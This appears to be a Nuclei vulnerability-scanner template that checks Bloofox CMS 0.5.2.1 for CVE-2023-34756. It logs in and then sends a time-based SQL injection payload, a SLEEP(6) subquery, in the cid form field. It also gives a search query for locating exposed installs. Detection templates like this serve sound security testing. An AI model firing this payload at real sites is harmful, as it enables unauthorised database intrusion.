58 lines
1.9 KiB
YAML
58 lines
1.9 KiB
YAML
id: CVE-2023-34756
|
|
|
|
info:
|
|
name: Bloofox v0.5.2.1 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
|
|
reference:
|
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
|
- https://www.bloofox.com
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34756
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-34756
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01254
|
|
epss-percentile: 0.84026
|
|
cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: bloofox
|
|
product: bloofoxcms
|
|
fofa-query: "Powered by bloofoxCMS"
|
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /admin/index.php HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{username}}&password={{password}}&action=login
|
|
- |
|
|
@timeout: 10s
|
|
POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- duration>=6
|
|
- status_code == 200
|
|
- contains(header, "text/html")
|
|
- contains(body_2, 'Admincenter')
|
|
condition: and
|
|
|
|
# digest: 4a0a004730450220730c39d0df4f07a2cbe5c013d958320b645a5677965145b759600d4660ae8848022100f347f062a99eca7b034d79b71aacdcf1eaa16359aebd74d84ebe1c1d95d2576d:922c64590222798bb761d5b6d8e72950
|